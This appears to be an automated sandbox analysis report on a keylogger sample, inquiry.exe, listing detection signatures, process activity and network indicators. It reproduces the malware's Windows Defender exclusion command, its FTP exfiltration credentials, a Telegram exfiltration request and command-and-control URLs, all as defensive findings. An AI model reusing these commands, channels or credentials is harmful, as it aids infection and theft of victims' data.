Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
inquiry.exe

Overview

General Information

Sample name:inquiry.exe
Analysis ID:1518503
MD5:e645b187588a20e886416884000446db
SHA1:1197c4cb571201164af8e2f98f787be189c9aa63
SHA256:32bb184d40c1cd31619acef73c72cff265023617438eedc0890da62b50f6ff98
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected UAC Bypass using CMSTP
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Disables UAC (registry)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • inquiry.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\inquiry.exe" MD5: E645B187588A20E886416884000446DB)
    • powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2712 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • MSBuild.exe (PID: 7860 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 7880 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • WerFault.exe (PID: 8052 cmdline: C:\Windows\system32\WerFault.exe -u -p 7340 -s 1312 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "august@fastestpay.digital", "Password": "1Qj;XlmD!Lrj", "FTP Server": "ftp://ftp.fastestpay.digital/"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
    0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 16 entries
            SourceRuleDescriptionAuthorStrings
            10.2.MSBuild.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              10.2.MSBuild.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                10.2.MSBuild.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  10.2.MSBuild.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    10.2.MSBuild.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                    • 0x2df18:$a1: get_encryptedPassword
                    • 0x2e235:$a2: get_encryptedUsername
                    • 0x2dd28:$a3: get_timePasswordChanged
                    • 0x2de31:$a4: get_passwordField
                    • 0x2df2e:$a5: set_encryptedPassword
                    • 0x2f5b0:$a7: get_logins
                    • 0x2f513:$a10: KeyLoggerEventArgs
                    • 0x2f178:$a11: KeyLoggerEventArgsEventHandler
                    Click to see the 33 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\inquiry.exe", ParentImage: C:\Users\user\Desktop\inquiry.exe, ParentProcessId: 7340, ParentProcessName: inquiry.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, ProcessId: 7812, ProcessName: powershell.exe
                    Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7860, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49700
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\inquiry.exe", ParentImage: C:\Users\user\Desktop\inquiry.exe, ParentProcessId: 7340, ParentProcessName: inquiry.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, ProcessId: 7812, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\inquiry.exe", ParentImage: C:\Users\user\Desktop\inquiry.exe, ParentProcessId: 7340, ParentProcessName: inquiry.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force, ProcessId: 7812, ProcessName: powershell.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-25T18:50:28.336191+020028033053Unknown Traffic192.168.2.749707188.114.96.3443TCP
                    2024-09-25T18:50:29.699751+020028033053Unknown Traffic192.168.2.749709188.114.96.3443TCP
                    2024-09-25T18:50:30.954344+020028033053Unknown Traffic192.168.2.749711188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-25T18:50:26.489574+020028032742Potentially Bad Traffic192.168.2.749700158.101.44.24280TCP
                    2024-09-25T18:50:27.715748+020028032742Potentially Bad Traffic192.168.2.749700158.101.44.24280TCP
                    2024-09-25T18:50:29.129943+020028032742Potentially Bad Traffic192.168.2.749708158.101.44.24280TCP
                    2024-09-25T18:50:30.364603+020028032742Potentially Bad Traffic192.168.2.749710158.101.44.24280TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                    Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                    Source: 2.2.inquiry.exe.1f8100554c0.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "august@fastestpay.digital", "Password": "1Qj;XlmD!Lrj", "FTP Server": "ftp://ftp.fastestpay.digital/"}
                    Source: inquiry.exeReversingLabs: Detection: 36%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: inquiry.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org

                    Exploits

                    barindex
                    Source: Yara matchFile source: 00000002.00000002.1511673057.000001F800340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTR
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49732 version: TLS 1.2
                    Source: inquiry.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Windows.Forms.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: mscorlib.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Drawing.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Core.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbmscorlib.dll source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Core.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER355F.tmp.dmp.15.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0103F2EDh10_2_0103F15F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0103F2EDh10_2_0103F33C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 0103FAA9h10_2_0103F7F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054C2C21h10_2_054C2970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CF019h10_2_054CED70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CEBC1h10_2_054CE918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054C31E8h10_2_054C3116
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CF471h10_2_054CF1C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054C31E8h10_2_054C2DCA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054C31E8h10_2_054C2DD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_054C0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CE311h10_2_054CE068
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CDEB9h10_2_054CDC10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CE769h10_2_054CE4C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CD609h10_2_054CD360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CD1B1h10_2_054CCF08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054C0D0Dh10_2_054C0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054C1697h10_2_054C0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CDA61h10_2_054CD7B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CFD21h10_2_054CFA78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then jmp 054CF8C9h10_2_054CF620

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49710 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49700 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 188.114.96.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49709 -> 188.114.96.3:443
                    Source: unknownFTP traffic detected: 192.64.117.204:21 -> 192.168.2.7:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 45 allowed.220-Local time is now 12:50. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49705 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:21:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: time.windows.com
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.fastestpay.digital
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 25 Sep 2024 16:50:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
